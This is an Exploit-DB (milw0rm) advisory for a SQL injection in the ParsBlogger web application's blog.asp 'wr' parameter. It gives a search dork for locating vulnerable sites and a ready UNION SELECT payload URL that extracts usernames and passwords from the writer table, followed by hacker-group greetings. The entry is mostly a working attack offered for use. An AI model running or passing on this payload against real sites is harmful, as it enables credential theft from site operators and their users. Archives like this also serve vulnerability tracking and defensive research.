ParsBlogger - 'blog.asp' SQL Injection

EDB-ID:

7239


Author:

h4ck3r

Type:

webapps


Platform:

PHP

Date:

2008-11-26


--------------------------------------------------------------------------------------------------------------------

[~] Script   : ParsBlogger

[~] Version  : >!<

[~] Link       : http://www.parsblogger.com

[~] Dork      : "Powered by ParsBlogger"

[~] Author   : BorN To K!LL

[~] TeaM     : Security Geeks [ Sec-Geeks.com ]

--------------------------------------------------------------------------------------------------------------------

[~] Exploit :.

site.ir/blog.asp?wr=[SQL]

[~] Example :.

site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--

--------------------------------------------------------------------------------------------------------------------

[~] Greetings :.

[ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims

--------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-11-26]